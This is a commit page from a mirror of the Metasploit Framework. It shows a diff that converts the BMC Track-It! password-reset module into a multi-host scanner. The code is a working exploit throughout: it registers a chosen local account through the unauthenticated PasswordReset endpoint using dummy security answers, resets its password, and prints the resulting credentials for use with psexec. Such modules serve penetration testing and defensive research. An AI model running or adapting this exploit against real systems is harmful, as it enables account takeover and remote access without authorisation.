infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Mixin Scanner. Yay speed!

bug/bundler_fix
Jon Hart 2014-12-11 14:44:48 -08:00
parent c9acd7a233
commit 0a29326ce7
1 changed files with 21 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
modules/auxiliary/gather/bmc_trackit_passwd_reset.rb
View File

@ -9,6 +9,7 @@ class Metasploit4 < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -38,26 +39,31 @@ class Metasploit4 < Msf::Auxiliary
], self.class) ], self.class)
end end
def run def localuser
res = send_request_cgi({ datastore['LOCALUSER']
end
def run_host(ip)
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'PasswordReset'), 'uri' => normalize_uri(target_uri.path, 'PasswordReset'),
}) )
unless res unless res
fail_with(Failure::Unknown, "Could not contact server") print_error("#{peer}: Could not contact server")
return
end end
cookies = res.get_cookies cookies = res.get_cookies
domain = $1 if res.body =~ /"domainName":"(.*)"\}\);/ domain = $1 if res.body =~ /"domainName":"(.*)"\}\);/
domain = datastore['DOMAIN'] if datastore['DOMAIN'] != '' domain = datastore['DOMAIN'] if datastore['DOMAIN'] != ''
res = send_request_cgi({ res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'PasswordReset', 'Application', 'Register'), 'uri' => normalize_uri(target_uri.path, 'PasswordReset', 'Application', 'Register'),
'method' => 'POST', 'method' => 'POST',
'cookie' => cookies, 'cookie' => cookies,
'vars_post' => { 'vars_post' => {
'domainname' => domain, 'domainname' => domain,
'userName' => datastore['LOCALUSER'], 'userName' => localuser,
'emailaddress' => Rex::Text.rand_text_alpha(8) + '@' + Rex::Text.rand_text_alpha(8) + '.com', 'emailaddress' => Rex::Text.rand_text_alpha(8) + '@' + Rex::Text.rand_text_alpha(8) + '.com',
'userQuestions' => '[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]', 'userQuestions' => '[{"Id":1,"Answer":"not"},{"Id":2,"Answer":"not"}]',
'updatequesChk' => 'false', 'updatequesChk' => 'false',
@ -68,10 +74,11 @@ class Metasploit4 < Msf::Auxiliary
'confirmanswer' => 'not', 'confirmanswer' => 'not',
'confirmanswer' => 'not' 'confirmanswer' => 'not'
} }
}) )
if !res or res.body != "{\"success\":true,\"data\":{\"userUpdated\":true}}" if !res || res.body != "{\"success\":true,\"data\":{\"userUpdated\":true}}"
fail_with(Failure::Unknown, "Could not register the user.") print_error("#{peer}: Could not register the #{localuser} user")
return
end end
password = Rex::Text.rand_text_alpha(10) + "!1" password = Rex::Text.rand_text_alpha(10) + "!1"
@ -83,16 +90,16 @@ class Metasploit4 < Msf::Auxiliary
'vars_post' => { 'vars_post' => {
'newPassword' => password, 'newPassword' => password,
'domain' => domain, 'domain' => domain,
'UserName' => datastore['LOCALUSER'], 'UserName' => localuser,
'CkbResetpassword' => 'true' 'CkbResetpassword' => 'true'
} }
}) })
if !res or res.body != '{"success":true,"data":{"PasswordResetStatus":0}}' if !res || res.body != '{"success":true,"data":{"PasswordResetStatus":0}}'
fail_with(Failure::Unknown, "Could not change the user's password. Is it a domain or local user?") print_error("#{peer}: Could not change #{localuser}'s password -- is it a domain or local user?")
return
end end
print_status("Please run the psexec module using:") print_good("#{peer} Please run the psexec module using #{domain}\\#{localuser}:#{password}")
print_status("#{domain}\\#{datastore['LOCALUSER']}:#{password}")
end end
end end